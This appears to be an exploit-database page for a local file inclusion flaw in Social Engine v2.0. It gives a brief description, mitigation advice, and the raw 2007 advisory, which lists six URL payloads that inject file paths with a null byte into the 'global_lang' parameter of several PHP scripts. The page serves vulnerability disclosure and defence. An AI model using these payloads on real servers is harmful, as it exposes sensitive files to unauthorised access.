header-logo
Suggest Exploit
vendor:
Social Engine
by:
MhZ91
5.5
CVSS
MEDIUM
Local File Inclusion
22
CWE
Product Name: Social Engine
Affected Version From: Social Engine v2.0
Affected Version To: Social Engine v2.0
Patch Exists: NO
Related CWE:
CPE: a:social_engine:2.0
Metasploit:
Other Scripts:
Platforms Tested: All
2007

Social Engine v2.0 โ€“ Local File Inclusion

This exploit allows an attacker to include local files on the server by manipulating the 'global_lang' parameter in various PHP files. By injecting a local file path and the null byte (%00) at the end of the parameter, the attacker can access sensitive files on the server.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and avoid passing user-supplied data directly to file inclusion functions. Additionally, access controls should be implemented to restrict unauthorized access to sensitive files.
Source

Exploit-DB raw data:

---------------------------------------------------------------
 ____            __________         __             ____  __  
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  | 
 |___|___|  /\__|  /______  /\___  >__|            |___||__| 
          \/\______|      \/     \/                          
---------------------------------------------------------------
Http://www.inj3ct-it.org     Staff[at]inj3ct-it[dot]org 
---------------------------------------------------------------
  Local File Inclusion
---------------------------------------------------------------
# Author: MhZ91
# Title: Social Engine v2.0 - Local File Inclusion
# Download: http://scriptmafia.org/2007/12/17/social_engine_v2.0.html
# Bug: Local File Inclusion
# Visit: http://www.inj3ct-it.org
---------------------------------------------------------------
Exploit: http://[site]/admin/admin_header_album.php?global_lang=[LFI]%00
Exploit: http://[site]/admin/admin_header_blog.php?global_lang=[LFI]%00
Exploit: http://[site]/admin/admin_header_group.php?global_lang=[LFI]%00
Exploit: http://[site]/header_album.php?global_lang=[LFI]%00
Exploit: http://[site]/header_blog.php?global_lang=[LFI]%00
Exploit: http://[site]/header_group.php?global_lang=[LFI]%00
---------------------------------------------------------------

# milw0rm.com [2007-12-21]

Navigation

Suggest Exploit

Services By CQR

cqrsecured